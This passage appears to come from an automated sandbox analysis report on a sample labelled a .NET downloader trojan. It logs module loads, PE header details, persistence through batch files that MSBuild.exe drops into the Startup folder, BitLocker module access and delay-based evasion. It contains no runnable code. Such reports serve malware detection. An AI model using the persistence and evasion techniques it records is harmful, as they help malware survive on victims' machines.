          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic file information: File size 2274400 > 1048576
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: section name: .managed
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeStatic PE information: section name: hydrated

          Boot Survival

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBBVbA3zq6R2KekyMmBCsddO.batJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v6vceHiI5YDkGCej6J99jPOi.batJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HmybwgSSguRbNIGR4y7xNho1.batJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.batJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NQwtNbU54qs5kl5tTGMFFPkC.batJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.batJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.batJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HmybwgSSguRbNIGR4y7xNho1.batJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBBVbA3zq6R2KekyMmBCsddO.batJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v6vceHiI5YDkGCej6J99jPOi.batJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NQwtNbU54qs5kl5tTGMFFPkC.batJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeMemory allocated: 19C17790000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 14F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2F70000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599884Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599775Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599660Jump to behavior
